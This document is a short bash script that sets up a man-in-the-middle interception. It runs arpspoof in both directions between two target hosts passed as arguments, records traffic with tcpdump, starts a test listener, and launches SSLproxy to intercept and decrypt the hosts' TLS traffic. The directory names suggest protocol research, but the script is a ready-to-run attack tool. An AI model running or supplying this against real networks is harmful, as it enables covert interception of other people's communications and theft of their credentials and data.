#!/bin/bash
arpspoof -i eth0 -t $1 -r $2 >/dev/null 2>&1 &
arpspoof -i eth0 -t $2 -r $1 >/dev/null 2>&1 &
tcpdump -s 0  -i lo -w mycap.pcap &
/MMSproxy/SSLproxy-master/tests/testproxy/lp/lp 127.0.0.1 3783 &
#python3 echopacket.py &
/MMSproxy/SSLproxy-master/src/sslproxy -f SSLproxy-master/src/sslproxy.conf
